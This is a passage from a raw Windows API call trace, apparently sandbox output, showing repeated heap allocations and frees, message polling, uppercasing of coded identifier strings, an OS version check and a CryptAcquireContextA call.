Flags=0x0, Size=0x10) returned 0x2aab278 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0212.749] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.749] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0212.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.749] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0212.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.749] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0212.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.749] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.750] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.750] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0212.750] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0212.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.751] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.751] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.752] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0212.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.752] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.752] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.752] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.753] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.753] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.753] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.753] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.753] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.753] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.753] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.753] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c198) returned 1 [0212.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.754] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.754] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.754] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.754] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.755] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.755] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.755] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.755] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.755] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.755] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.756] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.756] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.756] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.756] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.756] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.756] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.756] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.757] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.757] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.757] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.757] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.757] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.758] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.758] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 